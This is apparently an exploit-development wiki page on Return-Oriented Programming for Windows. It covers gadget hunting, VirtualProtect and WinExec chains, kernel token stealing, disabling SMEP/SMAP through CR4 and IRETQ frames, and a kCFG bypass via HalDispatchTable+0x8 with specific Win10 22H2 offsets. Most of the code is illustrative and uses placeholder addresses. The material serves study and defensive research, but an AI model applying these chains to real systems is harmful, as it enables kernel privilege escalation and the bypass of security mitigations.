Return-Oriented Programming (ROP)
Last updated: 2026-04-11
Related: Mitigations, Primitives, Use After Free, Reversing
Tags: user-mode, kernel-mode, rop, dep-bypass
Summary
ROP (Return-Oriented Programming) is the primary technique for executing controlled computation after DEP/NX prevents traditional shellcode. Instead of injecting new code, ROP chains together short sequences of existing code ending in ret instructions (“gadgets”), redirected via a controlled stack. Modern exploitation on Windows almost universally requires ROP or its variants.
Core Concept
Normal stack:    ROP stack:
[ret addr]       [gadget1 addr]     ← popped into RIP; gadget1 executes and hits ret
[locals]         [gadget1 arg]      ← consumed if the gadget pops from the stack
                 [gadget2 addr]     ← next ret lands here
                 [gadget2 arg]
                 ...
                 [VirtualProtect]   ← often used to mark shellcode executable
                 [arg1]
                 [arg2]
                 [arg3]
                 [shellcode addr]
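The stack layout above can be mimicked with a toy interpreter. This is only a conceptual sketch: the "gadgets" are Python functions, the addresses (0x1000 and so on) are made up for the illustration, and the loop stands in for the `ret` instruction that pops the next address.

```python
# Toy model of a ROP stack: gadgets are Python functions keyed by fake addresses.
# Each gadget may pop operands from the stack; the loop plays the role of `ret`.

def run_chain(stack, gadgets):
    """Pop an address, run its gadget, repeat until the stack is empty."""
    regs = {"rax": 0, "rbx": 0}
    stack = list(stack)              # index 0 is the top of the stack
    trace = []
    while stack:
        addr = stack.pop(0)          # `ret`: next stack slot becomes the instruction pointer
        name, effect = gadgets[addr]
        effect(regs, stack)          # gadget body, may consume further stack slots
        trace.append(name)
    return regs, trace

def pop_rax(regs, stack):
    regs["rax"] = stack.pop(0)

def pop_rbx(regs, stack):
    regs["rbx"] = stack.pop(0)

def add_rax_rbx(regs, stack):
    regs["rax"] = (regs["rax"] + regs["rbx"]) & 0xFFFFFFFFFFFFFFFF

# Hypothetical addresses, chosen only for this example.
GADGETS = {
    0x1000: ("pop rax ; ret", pop_rax),
    0x2000: ("pop rbx ; ret", pop_rbx),
    0x3000: ("add rax, rbx ; ret", add_rax_rbx),
}

chain = [0x1000, 40, 0x2000, 2, 0x3000]
regs, trace = run_chain(chain, GADGETS)
print(regs["rax"], trace)
```

The chain interleaves gadget addresses with the values those gadgets pop, which is the same interleaving the real stack needs.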
Gadget Types
Essential Gadget Categories
| Type | Example | Purpose |
|---|---|---|
| Load register | pop rax ; ret | Set register to constant |
| Move register | mov rax, rbx ; ret | Copy between registers |
| Write memory | mov [rax], rbx ; ret | Store value |
| Read memory | mov rax, [rbx] ; ret | Load value |
| Arithmetic | add rax, rbx ; ret | Compute addresses |
| Pivot | xchg rsp, rax ; ret | Redirect stack to attacker data |
| Call | call rbx ; ret (or jmp) | Invoke function |
Stack Pivot Gadgets
Essential when the stack is not controlled but a register points to attacker data:
xchg rsp, rax ; ret ; RSP = RAX
add rsp, N ; ret ; skip over stack data to controlled region
mov rsp, [rbx+N] ; ret ; load stack pointer from memory
leave ; ret ; mov rsp,rbp; pop rbp — useful for frame-based pivot
Gadget Hunting
Tools
- ROPgadget (ROPgadget --binary target.exe)
- ropper (ropper -f target.exe)
- rp++ (fast, supports PE/ELF/Mach-O)
- mona.py (WinDbg plugin, excellent for exploit dev)
- pwntools ROP module (automated chain generation)
Finding Gadgets in Loaded Modules
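# Using pwntools. Its ELF loader parses only ELF images, so this applies to
# ELF targets; for PE modules such as ntdll.dll use rp++, ropper, or ROPgadget.
from pwn import *
elf = ELF("./target.elf")  # placeholder path to an ELF binary
rop = ROP(elf)
rop.find_gadget(['pop rdi', 'ret'])  # returns the matching gadget, or None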
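What the tools above do can be approximated, very roughly, by a byte-pattern scan. The sketch below is an assumption-laden simplification: it matches a few fixed x64 encodings that end in `ret` (0xC3) instead of disassembling backwards from every `ret`, and the sample buffer and base address are invented.

```python
# Minimal gadget scan: report each offset where a known byte pattern ending
# in `ret` (0xC3) occurs. Real tools disassemble backwards from every `ret`.

PATTERNS = {
    "pop rax ; ret": bytes([0x58, 0xC3]),
    "pop rcx ; ret": bytes([0x59, 0xC3]),
    "pop rdx ; ret": bytes([0x5A, 0xC3]),
    "pop r8 ; ret": bytes([0x41, 0x58, 0xC3]),
    "xchg rax, rsp ; ret": bytes([0x48, 0x94, 0xC3]),
}

def find_gadgets(code, base=0):
    """Return sorted (address, mnemonic) pairs for every pattern match in `code`."""
    hits = []
    for name, pattern in PATTERNS.items():
        start = code.find(pattern)
        while start != -1:
            hits.append((base + start, name))
            start = code.find(pattern, start + 1)
    return sorted(hits)

# Invented sample bytes: nop, pop r8/ret, int3, pop rcx/ret, xchg rax,rsp/ret.
sample = bytes.fromhex("90 41 58 c3 cc 59 c3 48 94 c3")
gadgets = find_gadgets(sample, base=0x1000)
for address, name in gadgets:
    print(hex(address), name)
```

Note that `pop rax ; ret` is reported one byte into the `pop r8 ; ret` encoding: decoding from an unintended offset yields a different, equally usable gadget.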
Key Modules for Windows ROP
- ntdll.dll: always loaded, large gadget surface, base often recoverable through an info leak
- kernel32.dll: VirtualProtect, VirtualAlloc
- kernelbase.dll: wide API surface
- msvcrXX.dll: CRT gadgets
- ntoskrnl.exe: for kernel ROP chains
Windows-Specific ROP Patterns
VirtualProtect Chain (Classic User-Mode)
Mark shellcode page executable:
[pop rcx ; ret] RCX = shellcode address
[shellcode_addr]
[pop rdx ; ret] RDX = size
[0x1000]
[pop r8 ; ret] R8 = PAGE_EXECUTE_READWRITE (0x40)
[0x40]
[pop r9 ; ret] R9 = &OldProtect (writable address)
[writable_addr]
[VirtualProtect addr] call VirtualProtect
[shellcode addr] after return, jump to shellcode
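The layout above is just a sequence of 64-bit little-endian values. A minimal sketch of serializing such a sequence follows; every address in it is a made-up placeholder rather than a real module offset, and `build_chain` is a hypothetical helper name.

```python
import struct

def build_chain(entries):
    """Pack a list of 64-bit values as consecutive little-endian qwords."""
    return b"".join(struct.pack("<Q", value) for value in entries)

# All addresses below are placeholders for illustration only.
POP_RCX, POP_RDX, POP_R8, POP_R9 = 0x1111, 0x2222, 0x3333, 0x4444
VIRTUAL_PROTECT = 0x5555
SHELLCODE = 0x70000000
OLD_PROTECT = 0x70002000          # any writable address
PAGE_EXECUTE_READWRITE = 0x40

chain = build_chain([
    POP_RCX, SHELLCODE,               # lpAddress
    POP_RDX, 0x1000,                  # dwSize
    POP_R8, PAGE_EXECUTE_READWRITE,   # flNewProtect
    POP_R9, OLD_PROTECT,              # lpflOldProtect
    VIRTUAL_PROTECT,
    SHELLCODE,                        # slot VirtualProtect sees as its return address
])
print(len(chain), chain[:8].hex())
```

The slot directly after the function address is what the callee treats as its return address, which is why the shellcode address sits there.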
WinExec / CreateProcess Chain
If shellcode injection is blocked (ACG), run a command through an existing API instead:
[pop rcx ; ret]
[cmd_string_addr] "cmd.exe /c calc" (lpCmdLine)
[pop rdx ; ret]
[1] SW_SHOWNORMAL (uCmdShow)
[WinExec addr]
Kernel ROP (Token Steal)
In kernel space, chains typically:
- Set up registers for the token-steal logic
- Call PsLookupProcessByProcessId (or an equivalent) via gadgets
- Modify _EPROCESS.Token via a memory-write gadget
- Return cleanly so kernel state (IRQL, stack, GS) is restored; a botched return typically ends in a bug check such as IRQL_GT_ZERO_AT_SYSTEM_SERVICE
IRETQ Kernel Entry Frame (LSTAR Overwrite / WRMSR Exploit Class)
When LSTAR is overwritten to point at a ROP gadget (or the entry point of a kernel-mode trampoline), the CPU begins executing in ring 0 but with user-mode context: user GS, user RSP, user CR3. To restore full kernel context and continue a ROP chain safely, the standard sequence is:
Gadget 1: swapgs; iretq
- swapgs: swaps GS (user TEB) ↔ kernel KPCR; required before any kernel structure access
- iretq: performs a privileged return, popping RIP, CS, RFLAGS, RSP, SS from the stack in that order
IRETQ stack frame layout (must be prepared before syscall):
[ RIP ] ← pointer to gadget 2 (top of stack at IRETQ)
[ CS ] = 0x10 (kernel code segment)
[ RFLAGS ] = current RFLAGS with AC=1 (SMAP disabled), interrupts off
[ RSP ] = current RSP (IRETQ pops this into RSP; the subsequent CR4 gadget's `pop rbx` removes it)
[ SS ] = 0x18 (kernel stack segment, last/deepest)
Stack preparation assembly (values are pushed in reverse order, SS first, so RIP ends up on top for iretq):
; Prepare RFLAGS with AC set (SMAP override) and IF cleared
pushfq
pop rbx
or rbx, 0x40000 ; set AC (bit 18) so SMAP does not block access to user pages
btr rbx, 9 ; clear IF (bit 9) without touching AC
push rbx
popfq ; also update live RFLAGS now (AC takes effect before syscall; user mode cannot change IF)
push 0x18 ; SS
push rsp ; RSP (CR4 gadget's pop rbx will consume this)
push rbx ; RFLAGS for iretq (rbx still holds the modified value)
push 0x10 ; CS
push gadget2_addr ; RIP (top of stack for iretq); placeholder for the real address
syscall ; CPU → ring 0, RSP still user-space, jumps to LSTAR → gadget1
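The flag arithmetic in the listing above is easy to check offline. The sketch below assumes the standard x86-64 RFLAGS bit positions (AC is bit 18, IF is bit 9); the input value 0x246 is only a sample and `iretq_rflags` is a hypothetical helper name.

```python
AC_BIT = 1 << 18   # Alignment Check flag; doubles as the SMAP override
IF_BIT = 1 << 9    # Interrupt enable flag

def iretq_rflags(current):
    """Return `current` with AC set and IF cleared, all other bits untouched."""
    return (current | AC_BIT) & ~IF_BIT

flags = iretq_rflags(0x246)          # 0x246 is just a sample user-mode value
print(hex(flags))

# A mask narrower than bit 18 (for example 0xFF) would also drop AC:
too_narrow = (0x246 | AC_BIT) & 0xFF
print(hex(too_narrow), bool(too_narrow & AC_BIT))
```

Clearing a single bit with an inverted mask (or `btr` in assembly) avoids disturbing AC, which a low-byte mask would wipe out.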
Gadget 2: CR4 manipulation (to disable SMEP):
mov cr4, rax ; RAX = hardcoded CR4 value with bits 20+21 cleared (SMEP/SMAP off)
add rsp, 0x20 ; skip shadow space
pop rbx ; consume the RSP pushed in IRETQ frame
ret ; → shellcode
Stack alignment: keep the IRETQ frame on a 16-byte-aligned stack. Reserve space and mask RSP down (for example, sub rsp, 16 followed by and rsp, -16) before pushing the IRETQ frame.
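Two pieces of arithmetic from this part can be sanity-checked in a few lines: clearing CR4 bits 20 and 21, and rounding a stack pointer down to a 16-byte boundary. The CR4 and RSP values below are illustrative samples, not values read from any particular system, and the helper names are hypothetical.

```python
CR4_SMEP = 1 << 20
CR4_SMAP = 1 << 21

def clear_smep_smap(cr4):
    """Return the CR4 value with the SMEP and SMAP bits cleared."""
    return cr4 & ~(CR4_SMEP | CR4_SMAP)

def align_down_16(rsp):
    """Round a stack pointer down to the nearest 16-byte boundary."""
    return rsp & ~0xF

sample_cr4 = 0x350EF8                 # illustrative value with both bits set
patched_cr4 = clear_smep_smap(sample_cr4)
print(hex(patched_cr4))

sample_rsp = 0x000000D4A1FFF8C8       # illustrative user-mode stack pointer
print(hex(align_down_16(sample_rsp)))
```

Keeping the original CR4 value around matters as much as computing the patched one, since the return path restores it.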
Return to user-mode (swapgs; sysret): After the shellcode payload completes, return to user-mode using a swapgs; sysret gadget:
- sysret loads RIP from RCX (must be set to the return address in the user-mode caller)
- sysret loads RFLAGS from R11 (must be set to the original user RFLAGS)
- sysret does NOT modify RSP; RSP must be restored manually to the user-mode stack state
- swapgs before sysret restores user GS
; In shellcode, before returning:
add rsp, 0x18 ; restore stack past leftover IRETQ frame remnants
pop rcx ; RCX = return address (return to main())
mov rax, ORIGINAL_CR4 ; restore SMEP
sub rsp, 0x28
push gadget_swapgs_sysret ; CR4 gadget will ret into here
; ... set up CR4 gadget args in rax ...
mov r11, r12 ; r12 = original RFLAGS saved before syscall
ret ; → CR4 restore gadget → swapgs; sysret → user-mode
Key: save original RFLAGS to a callee-saved register (e.g., R12) before calling syscall. R12 is preserved across the ROP chain. Restore it to R11 just before sysret.
Kernel ROP for kCFG Bypass (HalDispatchTable+0x8 Pattern)
Without HVCI, kCFG only checks that the indirect call destination is in kernel address space (top bit set). Overwriting HalDispatchTable+0x8 with a kernel jmp <reg> gadget passes this check while redirecting execution to a user-controlled register:
1. Pre-load shellcode address into a callee-preserved register (R13-R15, RSI)
via a user-mode assembly stub before the kernel dispatch.
2. Overwrite HalDispatchTable+0x8 (offset 0xc00a68 from ntoskrnl base on Win10 22H2)
with address of "jmp r13" gadget (rp++ against ntoskrnl.exe: 0x80d5db offset).
3. Call NtQueryIntervalProfile(2, &dummy) — triggers indirect call through HalDispatchTable+0x8.
4. kCFG check: target is kernel address ✓ → jmp r13 executes → control → shellcode.
Key: R13/R14/R15/RSI survive unmodified from NtQueryIntervalProfile entry through to the HaliQuerySystemInformation dispatch point. Confirm this per target by setting breakpoints on both functions and comparing register state.
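The coarse check described above (top bit of the target set) and the base-plus-offset arithmetic can be modelled as follows. This is a sketch under stated assumptions: the ntoskrnl base is a hypothetical placeholder, the two offsets are the ones quoted in the steps above, and `is_kernel_address` models only the non-HVCI behaviour as this page describes it.

```python
MASK64 = 0xFFFFFFFFFFFFFFFF

def is_kernel_address(addr):
    """Coarse model of the check: the top bit of the 64-bit address is set."""
    return bool((addr >> 63) & 1)

def rebase(module_base, offset):
    """Turn a module-relative offset into an absolute 64-bit address."""
    return (module_base + offset) & MASK64

NT_BASE = 0xFFFFF80000000000          # hypothetical ntoskrnl base
hal_slot = rebase(NT_BASE, 0xC00A68)  # HalDispatchTable+0x8 offset quoted above
jmp_r13 = rebase(NT_BASE, 0x80D5DB)   # gadget offset quoted above

print(hex(hal_slot), hex(jmp_r13))
print(is_kernel_address(jmp_r13), is_kernel_address(0x00007FF612340000))
```

Under this model a kernel-resident gadget passes while a user-mode address does not, which is why the redirect goes through a kernel `jmp <reg>` gadget.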
See Mitigations §kCFG Bypass for full code.
CFG-Aware ROP (Modern Windows)
CFG restricts indirect calls such as call [reg]. Plain ret gadgets are not checked. However:
- CFG-instrumented code calls the check routine referenced by __guard_check_icall_fptr before each indirect call
- Gadgets that contain an instrumented indirect call fail unless the target is a valid CFG target
CFG-Compliant ROP Strategy
- Find gadgets that don’t use indirect calls (only ret, direct call, direct jmp)
- Use ret2libc: call imported functions via their addresses in the IAT (these are valid CFG targets because they are export addresses)
- Find “trampoline” gadgets: jmp [rax] where rax points to a valid CFG target
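The distinction between checked indirect calls and unchecked returns can be shown with a toy model. This is a deliberate simplification: real CFG consults a bitmap with 16-byte granularity, whereas the sketch uses a plain set, and the class, method names, and addresses are all hypothetical.

```python
class CfgViolation(Exception):
    """Raised when a guarded indirect call targets a non-registered address."""

class ToyCfg:
    """Set-based stand-in for the CFG valid-target bitmap."""

    def __init__(self, valid_targets):
        self.valid_targets = set(valid_targets)

    def guarded_icall(self, target):
        # Models the check performed before an instrumented indirect call.
        if target not in self.valid_targets:
            raise CfgViolation(hex(target))
        return f"call {target:#x}"

    def ret(self, target):
        # Returns are not validated by CFG in this model.
        return f"ret to {target:#x}"

FUNC_ENTRY = 0x140001000              # hypothetical exported function entry
MID_FUNCTION_GADGET = 0x140001037     # hypothetical gadget inside a function

cfg = ToyCfg([FUNC_ENTRY])
print(cfg.guarded_icall(FUNC_ENTRY))
print(cfg.ret(MID_FUNCTION_GADGET))
try:
    cfg.guarded_icall(MID_FUNCTION_GADGET)
except CfgViolation as exc:
    print("blocked:", exc)
```

In this model the mid-function address is reachable by `ret` but not by a guarded indirect call, which matches the strategy of preferring ret-only gadgets and whole-function targets.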
CET Bypass Implications
CET shadow stack invalidates return-address overwrites. Approaches:
- JOP (Jump-Oriented Programming): dispatch via jmp instead of ret; jmp does not interact with the shadow stack. Requires an IBT bypass too if IBT is enabled.
- ENDBR gadget chains: all gadgets must start with ENDBR64 when IBT is active
- longjmp abuse: _longjmp restores RSP and RIP (plus callee-saved registers such as RBX) from jmp_buf; if you can corrupt jmp_buf, you control the next execution point
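Why a shadow stack defeats return-address overwrites but not jump-based dispatch can be seen in a small simulation. The model below is an assumption-heavy sketch: `ToyCpu` and its methods are hypothetical, and real CET raises a control-protection exception in hardware instead of a Python error.

```python
class ControlProtectionFault(Exception):
    """Stand-in for the fault raised on a shadow stack mismatch."""

class ToyCpu:
    def __init__(self):
        self.stack = []      # normal stack, writable by a memory corruption bug
        self.shadow = []     # shadow stack, not writable by ordinary stores

    def call(self, return_addr):
        # A call records the return address on both stacks.
        self.stack.append(return_addr)
        self.shadow.append(return_addr)

    def ret(self):
        # A return compares the two copies before transferring control.
        addr = self.stack.pop()
        expected = self.shadow.pop()
        if addr != expected:
            raise ControlProtectionFault(f"{addr:#x} != {expected:#x}")
        return addr

    def jmp(self, target):
        # A jump never touches the shadow stack.
        return target

cpu = ToyCpu()
cpu.call(0x401000)
cpu.stack[-1] = 0xDEADBEEF            # simulated return-address overwrite
try:
    cpu.ret()
except ControlProtectionFault as exc:
    print("ret blocked:", exc)
print("jmp allowed:", hex(cpu.jmp(0xDEADBEEF)))
```

The jump path succeeds only because this model omits IBT; with IBT active the target would additionally need to begin with ENDBR64.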
Practical ROP Development Workflow
- Identify control point: where do you control RIP? (ret addr, vtable, function pointer)
- Determine constraints: which modules are loaded, are they CFG-enabled, is CET active?
- Find stack pivot: if RSP doesn’t point to controlled data, find pivot gadget
- Build chain manually or with tool: match calling convention (x64 Windows: RCX, RDX, R8, R9, stack)
- Handle ASLR: either use fixed-base module or have info leak for dynamic base
- Test incrementally: single-step through gadgets in debugger
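The ASLR step in the workflow above reduces to subtracting a known offset from a leaked pointer and adding gadget offsets back. A minimal sketch, assuming the leak points at a symbol whose module-relative offset is known; all numeric values and the helper name are invented for the example.

```python
def module_base(leaked_addr, symbol_offset):
    """Recover a module base from a leaked pointer to a symbol at a known offset."""
    base = leaked_addr - symbol_offset
    # Windows image bases are 64 KB aligned; anything else suggests a wrong offset.
    if base & 0xFFFF:
        raise ValueError(f"base {base:#x} is not 64 KB aligned")
    return base

# Invented values for illustration.
LEAKED_POINTER = 0x7FFB12345678
SYMBOL_OFFSET = 0x45678
GADGET_OFFSETS = {"pop rcx ; ret": 0x1A2B, "pop rdx ; ret": 0x3C4D}

base = module_base(LEAKED_POINTER, SYMBOL_OFFSET)
rebased = {name: base + offset for name, offset in GADGET_OFFSETS.items()}
for name, address in rebased.items():
    print(name, hex(address))
```

The alignment check is a cheap guard against pairing a leak with an offset from a different build of the module.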
Anti-ROP Techniques to Bypass
| Defense | Bypass |
|---|---|
| CFG | Use ret-only gadgets + valid indirect call targets |
| CET Shadow Stack | JOP, longjmp corruption |
| Stack canary | Need canary leak; or avoid stack overflow, use other control flow |
| SafeSEH/SEHOP | Don’t use SEH overwrite; or use 64-bit exception model |
Exploit Relevance
ROP is used in essentially every modern Windows exploit that doesn’t rely solely on data-only attacks. It is the backbone technique enabling DEP bypass, and its interaction with CFG/CET defines the complexity of modern exploit chains.
